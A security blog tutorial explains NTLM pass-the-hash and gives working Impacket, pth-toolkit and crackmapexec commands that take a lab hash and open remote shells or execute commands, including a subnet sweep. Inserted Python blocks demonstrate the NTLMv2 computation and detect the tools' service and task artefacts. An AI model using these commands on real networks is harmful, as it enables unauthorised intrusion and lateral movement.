Pass the hash: Gaining access without cracking passwords

Meriem Laroui
7 min read, Apr 15, 2021

Once attackers gain a foothold in a network, they tend to expand their control by compromising additional systems and obtaining higher privileges. The techniques used for that vary, but one of the best known is the “Pass the hash” technique. This attack uses the password hashes obtained by dumping the credentials on the compromised machine.

I invite you to check out this post, which covers the topic of dumping credentials on Windows machines:

Upon successfully dumping credentials on a compromised system, one obvious step is to try to crack them to obtain clear-text passwords and move easily across the network. But cracking is never guaranteed, and if it fails, it doesn’t mean we’ve reached a dead end.

Pass the hash is a lateral movement attack that abuses the nature of the challenge/response NTLM authentication protocol to authenticate with the hash of a user’s password instead of the clear-text password.

One thing that makes this attack so popular is that it works whenever NTLM authentication is enabled, which it is by default.

How does Pass the hash work?

The NTLM authentication protocol is based on a challenge/response exchange that goes as follows:

When a client wants to authenticate to a server, it sends a NEGOTIATE_MESSAGE to request access. The server then sends a CHALLENGE_MESSAGE containing a 64-bit challenge, a random value that is unique to each session, and asks the client to encrypt that challenge with the client’s password hash.

The client sends back an AUTHENTICATE_MESSAGE, which contains the encrypted challenge (the response) and the username, among other fields.

On an Active Directory infrastructure, the server forwards the response and the clear-text challenge to the domain controller, which encrypts the challenge with the user’s hash (which it knows) and compares the two values. If they are identical, access is granted!

It is clear that if someone possesses the hash of a certain user, they can impersonate that user and authenticate on their behalf by using that hash to encrypt the received challenge.
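To make the exchange above concrete, here is an added Python example (written for this post, not code from the article or from Impacket) that walks one NTLMv2 challenge/response round trip with both sides in a single script: the server’s challenge, the client’s response, and the domain controller’s check. It takes the NT hash of user1 from the lab commands later in the post as the value the domain controller stores; the user name, domain and challenge bytes are assumptions. The arithmetic follows MS-NLMP (NTLMv2 keys the response with HMAC-MD5 rather than literally encrypting the challenge), with the AV pairs reduced to their terminator, so it illustrates the computation and is not a wire-compatible client.

```python
import hashlib
import hmac
import os
import struct
import time
from typing import Optional

# NT hash of "user1" as it appears in the article's lab commands. In a real network
# this is the value credential dumping returns, and the value the DC stores.
LAB_NT_HASH = bytes.fromhex("3d278165f6d949465b60d71d42ae7ded")


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 (MS-NLMP 3.3.2): HMAC-MD5 keyed with the NT hash over
    UPPER(user) + domain, both UTF-16LE. Only the hash is needed as input."""
    identity = (user.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash, identity, hashlib.md5).digest()


def make_challenge() -> bytes:
    """CHALLENGE_MESSAGE: the server picks 8 random bytes (64 bits), fresh per session."""
    return os.urandom(8)


def client_authenticate(nt_hash: bytes, user: str, domain: str, challenge: bytes,
                        client_nonce: Optional[bytes] = None) -> bytes:
    """Build the NtChallengeResponse the client places in AUTHENTICATE_MESSAGE.
    AV pairs are reduced to the MsvAvEOL terminator (illustration, not a real client)."""
    nonce = client_nonce if client_nonce is not None else os.urandom(8)
    filetime = int((time.time() + 11644473600) * 10_000_000)  # Windows FILETIME
    temp = (b"\x01\x01" + b"\x00" * 6        # RespType, HiRespType, reserved
            + struct.pack("<Q", filetime)    # timestamp
            + nonce                          # client challenge
            + b"\x00" * 4                    # reserved
            + b"\x00" * 4                    # AV pairs: just MsvAvEOL
            + b"\x00" * 4)                   # reserved
    key = ntowf_v2(nt_hash, user, domain)
    proof = hmac.new(key, challenge + temp, hashlib.md5).digest()  # NTProofStr
    return proof + temp


def dc_verify(stored_nt_hash: bytes, user: str, domain: str, challenge: bytes,
              nt_response: bytes) -> bool:
    """What the domain controller does: recompute the proof from the hash it stores
    and compare. At no point is a clear-text password involved."""
    proof, temp = nt_response[:16], nt_response[16:]
    key = ntowf_v2(stored_nt_hash, user, domain)
    expected = hmac.new(key, challenge + temp, hashlib.md5).digest()
    return hmac.compare_digest(proof, expected)


def run_exchange(client_nt_hash: bytes, user: str = "user1", domain: str = "SSI",
                 challenge: Optional[bytes] = None) -> bool:
    """Full round trip; returns True if the DC (holding LAB_NT_HASH) accepts the logon."""
    challenge = challenge if challenge is not None else make_challenge()
    response = client_authenticate(client_nt_hash, user, domain, challenge)
    return dc_verify(LAB_NT_HASH, user, domain, challenge, response)


if __name__ == "__main__":
    print("correct hash accepted:", run_exchange(LAB_NT_HASH))  # True
    print("wrong hash accepted:  ", run_exchange(bytes(16)))    # False
```

The point to notice from the defender’s side: dc_verify() needs only the stored hash, and client_authenticate() needs only that same hash, so the NT hash is a password equivalent and has to be protected like one. The fresh per-session challenge only prevents replaying an old response; it does nothing against a party that holds the hash.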

How to Pass the hash?

There is a broad variety of tools that do the task perfectly; which one to use depends on the service/protocol we will be authenticating to. Any service that relies on NTLM authentication can be used in a pass the hash attack.

-Over SMB:

The Server Message Block (SMB) protocol is a network file sharing protocol that allows applications on a computer to read and write to files and to request services from server programs in a computer network.

The infamous Impacket toolkit has a bunch of Python scripts that interact with different services and can be used to carry out a pass the hash attack.

With psexec: PsExec is a legitimate Sysinternals executable, a lightweight telnet replacement that lets you execute processes on other systems. It is mostly used for launching interactive command prompts on remote systems, and it operates over SMB.

Impacket has thankfully blessed us with its own script for psexec. It takes the user’s hash, username, and IP address of the target machine. The good thing about it is that it gives back an interactive system shell, unlike tools like smbclient that give back a semi-interactive SMB shell. The bad side, though, is that it’s a little bit noisy!

After connecting to the ADMIN$ share (a hidden administrative share that gives system administrators remote access to every disk volume on a network-connected system), psexec.py transfers a binary to the target and places it in C:\Windows (which is where the ADMIN$ share points). It then creates a service called “PSEXECSVC” that points to that binary in C:\Windows. The service is started remotely and runs the executable that was uploaded over SMB.

Once the binary is running, it opens an RPC connection between the target and the attacker machine to exchange commands and their output.

Example:

The domain used in the lab is “SSI”, and I’ll be passing the hash of “user1” to the machine at 192.168.1.20, where user1 is a local administrator.

python psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:3d278165f6d949465b60d71d42ae7ded user1@192.168.1.20

With smbexec: Another tool by Impacket is smbexec.py, which also interacts with SMB.

Unlike psexec, smbexec is a stealthy tool that doesn’t transfer any executables to the target machine. Instead, it lives off the land by running the local Windows command shell.

It creates a service called “BTOBTO” in a very clever way. The service’s file name (the executable and parameters used to start the service) contains a command string that launches cmd.exe, echoes the command to a bat file, redirects the output to a temp file, executes the bat file (the command), then deletes it. The attacker machine fetches the temp file (which holds the output) via SMB and displays it in the semi-interactive shell. This whole process (from the creation of the service) is repeated EACH TIME the attacker types a new command, which is why it doesn’t need to transfer any binary files.

Example:

python smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:3d278165f6d949465b60d71d42ae7ded ssi/user1@192.168.1.20

With smbclient: Another Impacket tool is smbclient.py. It takes the NTLM hash, domain name, user name, and IP address of the target machine.

Example:

python smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:3d278165f6d949465b60d71d42ae7ded ssi/user1@192.168.1.20

With pth-smbclient: Another option is the pth-toolkit, which is included in Kali.

The pth-toolkit contains a script that interacts with SMB. pth-smbclient takes the domain name, user name, NTLM hash, and IP address of the target machine.

Example:

pth-smbclient -U ssi/user1%aad3b435b51404eeaad3b435b51404ee:3d278165f6d949465b60d71d42ae7ded //192.168.1.20/c$

With crackmapexec: One last tool is crackmapexec, a really awesome post-exploitation tool for attacking Active Directory networks.

crackmapexec takes the IP address, username, the NT hash, and the command that we want to execute on the target upon authentication. An awesome feature is that we can specify an IP range; crackmapexec will then attempt to pass that hash to all the live machines on that subnet, and if the user is a local administrator on any of them, it will show (Pwn3d) on the line of the compromised machine.

Example:

crackmapexec smb 192.168.1.20 -u user1 -H 3d278165f6d949465b60d71d42ae7ded -x whoami

crackmapexec smb 192.168.1.0/24 -u user1 -d ssi -H 3d278165f6d949465b60d71d42ae7ded -x ipconfig

-Over WMI:

WMI (Windows Management Instrumentation) is the infrastructure for managing data and operations on Windows-based operating systems.

By default, Windows Management Instrumentation is built into Windows and allows remote access over remote procedure calls on port 135. It can be used to start a service or execute a command remotely.

With wmiexec: Impacket (we adore Impacket, don’t we!) has a script that interacts with WMI to get a session on the target machine. It takes the username, hash, and IP of the target machine.

Example:

python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:3d278165f6d949465b60d71d42ae7ded ssi/user1@192.168.1.20

With pth-wmic: There is also a variant from the pth-toolkit, called pth-wmic.

Example:

pth-wmic -U ssi/user1%aad3b435b51404eeaad3b435b51404ee:3d278165f6d949465b60d71d42ae7ded //192.168.1.20 "select Name from Win32_UserAccount"

-Over RPC:

Remote procedure call (RPC) is a protocol that one program can use to request a service from a program located on another computer on the network without having to understand the network’s details.

With rpcdump: Impacket’s rpcdump.py lists the RPC endpoints exposed by the target.

Example:

python rpcdump.py -hashes aad3b435b51404eeaad3b435b51404ee:3d278165f6d949465b60d71d42ae7ded ssi/user1@192.168.1.20

With pth-rpcclient: Obviously, there is a variant from the pth-toolkit. It is called pth-rpcclient, and it launches an interactive RPC shell where we can execute RPC commands.

Example:

pth-rpcclient -U ssi/user1%aad3b435b51404eeaad3b435b51404ee:3d278165f6d949465b60d71d42ae7ded //192.168.1.20

With atexec: atexec is an Impacket tool that connects to the Task Scheduler service to execute commands remotely on the target system. It works like smbexec: it creates a task (with a random name) whose Action section holds the command to execute, then triggers it. After the execution finishes, it deletes the task. The result of the command is read from a file named after the task with .tmp appended, in the C:\windows\temp\ directory; that file is then deleted too.

It requires the user’s credentials, the IP address, the domain, and the command to execute.

Example:

python atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:3d278165f6d949465b60d71d42ae7ded user1@192.168.1.20 whoami
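Each of the tools above leaves artefacts on the target that the post itself names: psexec.py installs a service called PSEXECSVC, smbexec.py installs a service called BTOBTO whose binary path is a cmd.exe echo-to-bat one-liner, and atexec.py creates a randomly named scheduled task whose output lands in C:\windows\temp\<task>.tmp. As an added example from the defender’s side (not part of the original post), the Python below runs those three checks over a handful of constructed Windows events shaped like event 7045 (a service was installed, System log) and 4698 (a scheduled task was created, Security log). The event fields, computer names, service binary names and task names are made up for the demo.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample events (not real logs). Keys mirror the fields of Windows
# event 7045 (service installed) and 4698 (scheduled task created). The binary
# name, task name and output paths are invented to match the artefacts the
# article describes for psexec.py, smbexec.py and atexec.py.
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 7045, "Computer": "WS20.ssi.local", "ServiceName": "PSEXECSVC",
     "ImagePath": r"C:\Windows\xvVbPRqJ.exe"},
    {"EventID": 7045, "Computer": "WS20.ssi.local", "ServiceName": "BTOBTO",
     "ImagePath": r"%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>^&1 "
                  r"> C:\Windows\Temp\execute.bat & %COMSPEC% /Q /c C:\Windows\Temp\execute.bat "
                  r"& del C:\Windows\Temp\execute.bat"},
    {"EventID": 4698, "Computer": "WS20.ssi.local", "TaskName": r"\QwErTyUi",
     "TaskContent": "<Exec><Command>cmd.exe</Command>"
                    "<Arguments>/C whoami > C:\\Windows\\Temp\\QwErTyUi.tmp 2>&1</Arguments></Exec>"},
    # benign control: a real agent install should not fire
    {"EventID": 7045, "Computer": "WS21.ssi.local", "ServiceName": "Sysmon64",
     "ImagePath": r"C:\Windows\Sysmon64.exe"},
]

# Service names the article attributes to psexec.py and smbexec.py.
KNOWN_SERVICE_NAMES = {"PSEXECSVC", "BTOBTO"}
# A service whose binary path is a cmd.exe one-liner that echoes a command into a
# .bat file and later deletes it (the smbexec pattern). Matching the behaviour
# rather than the name still fires if the service name is changed.
ECHO_TO_BAT = re.compile(r"(cmd(\.exe)?|%COMSPEC%).*\becho\b.*\.bat.*\bdel\b", re.IGNORECASE)
# A scheduled task that writes its output to C:\Windows\Temp\<name>.tmp (the atexec pattern).
TEMP_TMP_OUTPUT = re.compile(r'C:\\Windows\\Temp\\[^\s"<>]+\.tmp', re.IGNORECASE)


def classify(event: Dict) -> List[str]:
    """Return every reason an event resembles one of the remote-execution artefacts."""
    reasons: List[str] = []
    if event.get("EventID") == 7045:
        if event.get("ServiceName", "").upper() in KNOWN_SERVICE_NAMES:
            reasons.append(f"known remote-exec service name {event['ServiceName']}")
        if ECHO_TO_BAT.search(event.get("ImagePath", "")):
            reasons.append("service ImagePath is a cmd.exe echo-to-bat one-liner (smbexec pattern)")
    elif event.get("EventID") == 4698:
        if TEMP_TMP_OUTPUT.search(event.get("TaskContent", "")):
            reasons.append("task writes output to C:\\Windows\\Temp\\*.tmp (atexec pattern)")
    return reasons


def hunt(events: List[Dict]) -> List[Tuple[str, int, List[str]]]:
    """Run classify() over a batch of events and keep only those that fired."""
    hits = []
    for event in events:
        reasons = classify(event)
        if reasons:
            hits.append((event["Computer"], event["EventID"], reasons))
    return hits


if __name__ == "__main__":
    for computer, event_id, reasons in hunt(SAMPLE_EVENTS):
        print(computer, event_id, "; ".join(reasons))
```

Matching on the service or task name alone is brittle, since those names are trivial to change; the ImagePath and .tmp-path rules key on the behaviour the post describes (a service that is really a cmd.exe one-liner, a task that dumps its output into C:\Windows\Temp) and still fire on a renamed variant of the same technique. In practice these rules would be paired with the 4624 network logon that precedes the service or task creation on the same host.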

Thank you for reading, and stay tuned for more :)

Follow me on Twitter, or LinkedIn.
